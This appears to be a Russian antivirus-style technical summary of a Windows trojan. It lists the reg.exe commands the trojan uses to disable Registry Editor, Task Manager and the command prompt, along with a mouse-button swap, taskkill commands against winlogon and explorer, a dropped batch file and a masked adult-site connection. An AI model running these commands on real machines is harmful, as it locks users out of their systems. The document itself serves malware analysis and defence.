Техническая информация
- Редактора реестра (RegEdit)
- '<SYSTEM32>\reg.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Polices\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
- '<SYSTEM32>\rundll32.exe' user32, SwapMouseButton
- '<SYSTEM32>\reg.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 2 /f
- '<SYSTEM32>\taskkill.exe' /f /im winlogon.exe
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\btec.bat""
- '<SYSTEM32>\taskkill.exe' /f /im explorer.exe
- '<SYSTEM32>\reg.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %WINDIR%explorer.exe /f
- %WINDIR%\Explorer.EXE
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\freepornhub[1]
- %TEMP%\1.tmp\btec.bat
- 'www.fr###ornhub.com':80
- 'localhost':1035
- www.fr###ornhub.com/
- DNS ASK www.fr###ornhub.com
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: 'IEFrame' WindowName: ''
- ClassName: '' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''